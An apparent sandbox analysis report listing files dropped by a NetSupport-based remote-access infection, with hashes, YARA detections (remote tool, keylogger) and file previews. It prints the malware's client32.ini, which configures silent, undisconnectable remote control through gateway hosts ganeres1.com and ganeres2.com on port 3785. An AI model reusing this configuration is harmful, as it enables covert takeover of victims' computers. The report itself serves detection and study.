                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                          • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):328056
                                                                                                          Entropy (8bit):6.754723001562745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                          MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                          SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                          SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                          SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\NSM.LIC

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):259
                                                                                                          Entropy (8bit):5.058986594877512
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:O/oP54xRPjwxVshvydDKHMoEEjLgpW2MWMf651XZNWYpPM/iooZa8l6i7s:X0R7wxQJjjqW2MWMf65TNBPM/io98l6J
                                                                                                          MD5:1DC87146379E5E3F85FD23B25889AE2A
                                                                                                          SHA1:B750C56C757AD430C9421803649ACF9ACD15A860
                                                                                                          SHA-256:F7D80E323E7D0ED1E3DDD9B5DF08AF23DCECB47A3E289314134D4B76B3ADCAF2
                                                                                                          SHA-512:7861ABE50EEFDF4452E4BAACC4B788895610196B387B70DDEAB7BC70735391ED0A015F47EADA94A368B82F8E5CEDB5A2096E624F4A881FF067937AD159E3562C
                                                                                                          Malicious:false
                                                                                                          Preview:1200..0xdb3e38e....; NetSupport License File...; Generated on 00:48 - 19/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=MGJFFRT466..maxslaves=100000..os2=1..product=10..serial_no=NSM301071..shrink_wrap=0..transport=0..

                                                                                                          C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18808
                                                                                                          Entropy (8bit):6.22028391196942
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                          MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                          SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                          SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                          SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\PCICL32.DLL

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3710280
                                                                                                          Entropy (8bit):6.518204410536431
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xOHDe5Yr6tYA4S+DjdwfwBTNZaZQclSpmTIH:xOHDe5YrvS+tBQSEm
                                                                                                          MD5:AD51946B1659ED61B76FF4E599E36683
                                                                                                          SHA1:DFE2439424886E8ACF9FA3FFDE6CAAF7BFDD583E
                                                                                                          SHA-256:07A191254362664B3993479A277199F7EA5EE723B6C25803914EEDB50250ACF4
                                                                                                          SHA-512:6C30E7793F69508F6D9AA6EDCEC6930BA361628EF597E32C218E15D80586F5A86D89FCBEE63A35EAB7B1E0AE26277512F4C1A03DF7912F9B7FF9A9A858CF3962
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....U...........!.......... ......].......................................09......9...............................................................8.H.....7.d...................................`...@....................w..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................p..............@....hhshare.............r..............@....rsrc................t..............@..@.reloc...,....7......V6.............@..B................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):391832
                                                                                                          Entropy (8bit):6.788660116314725
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
                                                                                                          MD5:405A7BCA024D33D7D6464129C1B58451
                                                                                                          SHA1:22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
                                                                                                          SHA-256:092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
                                                                                                          SHA-512:3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...;..U...........!......................................................................@.............................o...T...x....0..8....................@..`E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...8....0......................@..@.reloc..&F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\client32.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55456
                                                                                                          Entropy (8bit):3.9089814840046824
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:HtvrImfzoXK6DDvvvDvpvZMt+pan/opgRl2:lImfzoXK9/o66
                                                                                                          MD5:9497AECE91E1CCC495CA26AE284600B9
                                                                                                          SHA1:A005D8CE0C1EA8901C1B4EA86C40F4925BD2C6DA
                                                                                                          SHA-256:1B63F83F06DBD9125A6983A36E0DBD64026BB4F535E97C5DF67C1563D91EFF89
                                                                                                          SHA-512:4C892E5029A707BCF73B85AC110D8078CB273632B68637E9B296A7474AB0202320FF24CF6206DE04AF08ABF087654B0D80CBECFAE824C06616C47CE93F0929C9
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\client32.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L....Y.K............................ ........ ....@..................................'.......................................0..<....@...r..........P...P............ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc....r...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\client32.ini

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):637
                                                                                                          Entropy (8bit):5.387596614765334
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:pWqH+ZbsGSyLBa/vpVSXCxOZ7CCPfu82kJCYublu/fqILA:0qe6U8zxOLrVzusfpc
                                                                                                          MD5:5274A126EE2F7F926FB8F9AC53A57ABD
                                                                                                          SHA1:10EEB6DBD99013C7969C27D09104FCB0FFBD97DA
                                                                                                          SHA-256:B3F198F6976B2A97A0AAFD4127BF1A274C3CA388226DE13DA37F3B5976B439CA
                                                                                                          SHA-512:FCF0B3C57BD2DB6544274CB622C4855E915C74705C311E3F94749A401238EBF525FB4C9607528DEDB9944B8C682A3DA2E4BCDD9A0E6D7367241430E54AB290DB
                                                                                                          Malicious:false
                                                                                                          Preview:0x822315b....[Client].._present=1..DisableChatMenu=1..DisableDisconnect=1..DisableReplayMenu=1..SecurityKey2=dgAAAMMIrHFRU0tiSzaaF9m1asQA..Protocols=3..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SOS_RShift=0..DisableChat=1..SysTray=0..UnloadMirrorOnDisconnect=0..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\NetSups\client32u.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=ganeres1.com:3785..Port=3785..GSK=EM;A@JFA:D>D@EBIFK:N@FDF..SecondaryGateway=ganeres2.com:3785..SecondaryPort=3785..

                                                                                                          C:\Users\user\AppData\Local\DNScache\msauserext.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18944
                                                                                                          Entropy (8bit):5.268518137985743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Mn/g+juoejt267oVz36sV+Vxclf0d3gZwcWCzOW:g1Ac1WgZwQz
                                                                                                          MD5:C4029309233F46F89C99EECA439B279F
                                                                                                          SHA1:07D9A61ADD09A241ABF04AA03D727C78A2CB9932
                                                                                                          SHA-256:AD1712FD9634521ADF14DF34D49234B87731BA87D347F5D1A7E08F356531AD67
                                                                                                          SHA-512:25E76D3D52B8F1B2F597B70297541A06B4E6809EF76B8E27EDE657013FB4634A57DF86289C19EF4F113CC99D738EF2B2DC69F61B9AA44C16BCAFBBD4DF3FB62C
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e...6...6...6..M6...6...7...6...7...6...6...6...7...6...7...6...7...6...7...6..!6...6...7...6Rich...6........PE..L......]...........!.....0..........`1.......@............................................@A.........................:.......P.......p.......................... .......T............................................P......4:..@....................text...3........0.................. ..`.data........@.......4..............@....idata.......P.......6..............@..@.didat.......`.......>..............@....rsrc........p.......@..............@..@.reloc.. ............F..............@..B................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\mscat32.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11776
                                                                                                          Entropy (8bit):4.958216172325469
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6W3M4nhhiMUBcky6BY6iyREGa2XsA9EcMZE6f4mg9cT/55Sk4QW3iWwS:thhiMUBY6K6UZxNW3iWN
                                                                                                          MD5:E1E14A4208F014B12732E596AF8B497B
                                                                                                          SHA1:977EDCB5E3BBB964C41466D678FB122B02BC372E
                                                                                                          SHA-256:3044365184CFBFBA62EC55C013D66B1CD8A7F5BCBAAA1E68D58F998FE5A27B44
                                                                                                          SHA-512:99CEEF8A160D1E06726F683951C1CBC5637CA39AC62F938A3F7823192A11E42676717EB65F25DC438208C01D1812A0436040BCF27D9173EDF6581F89F620FEE0
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........j..j..j...N..j.....j.....j..j..j.....j.....j.....j..."..j.....j.Rich.j.................PE..L......[...........!................p........0.....`.........................p............@A......................... .......@.......P.. ....................`..h.......T............................................@...............................text............................... ..`.data...L....0......................@....idata..H....@......................@..@.rsrc... ....P.......&..............@..@.reloc..h....`.......,..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):2.560525784264512
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:eH1GSYWciw1lL/ReD5uIZW072wmgNuKpB35WWdPPYPNy:yYQGLRwcIZWINuyx5WwHg
                                                                                                          MD5:8C3A464EE6AA2B5AA573564D9BD6541D
                                                                                                          SHA1:4868CAC6E7C788BFD736A696F633D8CFD7A620EC
                                                                                                          SHA-256:E5CA3F9B9833184C35AD89F615BF7A5108B7721D685A795CE4019C3D2609FDE6
                                                                                                          SHA-512:71E97D0BE449D9BC423AD253E11AD848BAFFD70B60AD20240224BF04DCA279BAF4ECEC9AD65B72C487715F5A109ECF9EAD6528D758B5696970204953CB9EE5FE
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...k`c............!.........................................................0......k.....@.......................................... .. ...............................8............................................................................text...............................@..@.rsrc... .... ......................@..@....k`c.........T...8...8.......k`c.........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ....,v..Y..b....,1... yU=8Vh)k`c.........................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14848
                                                                                                          Entropy (8bit):5.455474829818716
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8gRP+xeEPR4l8fxjL9+EM/ko5V5HWLpW:8u+xFPR4lqx0RfO
                                                                                                          MD5:0DD075E74F248AEBC50F5A2DCB5BF42B
                                                                                                          SHA1:857FD626A19ED5EB99155D71DC2C4293D1A2DF0C
                                                                                                          SHA-256:432B1BF04B68942BD54A8DFCE2799D733881351AC9B1FF2F0C4D2EF49F8C3613
                                                                                                          SHA-512:9866AF509EF3EE42093BDE90847CA6A8D7B9BFFA5C38474AF16F815689328229B4F21C33A2535A4F86F671B35902668E76CD8E636CD5E726CD5B31D9226B8401
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.b.q...q...q...e...p...e...}...q...\...e...v...e...p...e...r...e..p...e...p...Richq...........PE..L....=.L...........!.....$...4.......+.......@............................................@A........................ 3.......p..P...............................L... ...T............................................p...............................text....#.......$.................. ..`.data....$...@.......(..............@....idata..l....p.......*..............@..@.rsrc................0..............@..@.reloc..L............6..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21384
                                                                                                          Entropy (8bit):6.505465569400541
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:90DT4KNMJFJwjp3/rWcW5gWsHb914gHRN7+X7aJdlGsG:Cw0MnJc3GUbjQ7aJG
                                                                                                          MD5:93FD1AFD72BC414788B8422508F69101
                                                                                                          SHA1:1E2FCF6B1B1005C7A8E04F3AE18065FB57CBCEB2
                                                                                                          SHA-256:8DB18F6CB26D179EE5374DA687A9FDDFCB0B3B2A99346FEAA95844C830BDA606
                                                                                                          SHA-512:9A3725D7AEA385DDA331CD569C8B4BE953761E406729F04D4872B3C0EB914B993AD521AD2963C74D59ACE0CEC547E1D20AE18E278FE9A743009D10F9DC838EC1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........n.`.=.`.=.`.=...<.`.=..1=.`.=...<.`.=...<.`.=.`.=.`.=...<.`.=...<.`.=...<.`.=..]=.`.=...<.`.=Rich.`.=........................PE..L....L.`.........."!................ ........0...............................p......~|....@A.........................*..J....@..x....P...............0...#...`..t...X...8...............................@............@...............................text............................... ..`.data...0....0....... ..............@....idata.......@......."..............@..@.rsrc........P.......(..............@..@.reloc..t....`.......,..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18832
                                                                                                          Entropy (8bit):6.4434700117269585
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:tKDL6r3uJBAjEOTWikEWEZ1e14gHRN7NslXFTnh:Aa3urdT8GNmt
                                                                                                          MD5:0AB5BACD140CB2A1014A2EF49E56A770
                                                                                                          SHA1:CE60ADF0EF64B3C0B69F4EC69A7BEA855E448D57
                                                                                                          SHA-256:DE699589DB52A7E952B3F2DF186E346B1A68E7AD9F6DC38C390D4A1CEB99FEAC
                                                                                                          SHA-512:025B5301320000DCB09EECB4D0B20CC0F991121A4CCC911A88BDE4D83387FC995A84FE7B7E88907A38AEFA9B35B67C29390220743DC193CD938C45D6F798B390
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mm[............v~.......t..............uz......uz......uz......uz......uz......uz......uz......Rich............PE..L....L.`.........."!.........................0...............................p............@A........................0"../...p@..P....P..0............&...#...`..L...D...8...............................@............@..h............................text..._........................... ..`.data........0......................@....idata..x....@......................@..@.rsrc...0....P......................@..@.reloc..L....`.......$..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\msvcr100.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):773968
                                                                                                          Entropy (8bit):6.901559811406837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                          MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                          SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                          SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                          SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\neth.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):2.8002329163397075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:eH1GSZhLcgqbzC2tACIZW098CQNuv2S435WWdPPYPNyDjrsC:yTLcg12tVIZWO8tulG5WwHgwrs
                                                                                                          MD5:84F50C4ACD6A1DEE845DD5B9E9CBFDED
                                                                                                          SHA1:337E4B5AE8060F43BBA726E823C6039FB422661C
                                                                                                          SHA-256:2E225340E39ABAA2458585573E63E5A54D75228D13B8AF6FBE608CC0D0C15378
                                                                                                          SHA-512:573EA97C9DBAE14722902E306D0F88AB54CB9E015F59DA69B680D8075F0E6BD186B99FE7FAAA4EE697C051F4CFA9D583E2AEBAD409D5715FB1465D13C7380050
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L.....p...........!..............................`D.........................0............@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@......p........T...8...8.........p........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... .....!.qf.|.I.?.z!t...$8.It..t...p........................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\netmsg.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):2.80282468887158
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:eH1GSPEcpcgKEOlxmM87C2tACIZW0s8A8YNu49hZ35WWdPPYPNyydsC:ybpcgc8O2tVIZWv8ADu4hJ5WwHgFds
                                                                                                          MD5:4FCF8ECBD47D01828AA075D9F25DC681
                                                                                                          SHA1:1AC5DCD81C3435B41E29F5C564F1D52A1511C69D
                                                                                                          SHA-256:2FC489C36E823CDD45A250DC7C9306B8C2A73819D1D054AEAB63FF4E113A8760
                                                                                                          SHA-512:952F256D05E23B4D6772B6304F0AA3FB2F7D959C06546937DE7CD62631ACE2CF8110BCF61A448A51974E58C44D6FAE83C942F8F0535F68A6488AE1DAC44730E4
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L.....N............!..............................XD.........................0......~\....@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@......N.........T...8...8.........N.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... ...1.V..r?...`.\P....{2.<..~...N.........................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\nskbfltr.inf

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:Windows setup INFormation
                                                                                                          Category:dropped
                                                                                                          Size (bytes):328
                                                                                                          Entropy (8bit):4.93007757242403
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                          MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                          SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                          SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                          SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                          Malicious:false
                                                                                                          Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                          C:\Users\user\AppData\Local\DNScache\nsm_vpro.ini

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):46
                                                                                                          Entropy (8bit):4.532048032699691
                                                                                                          Encrypted:false
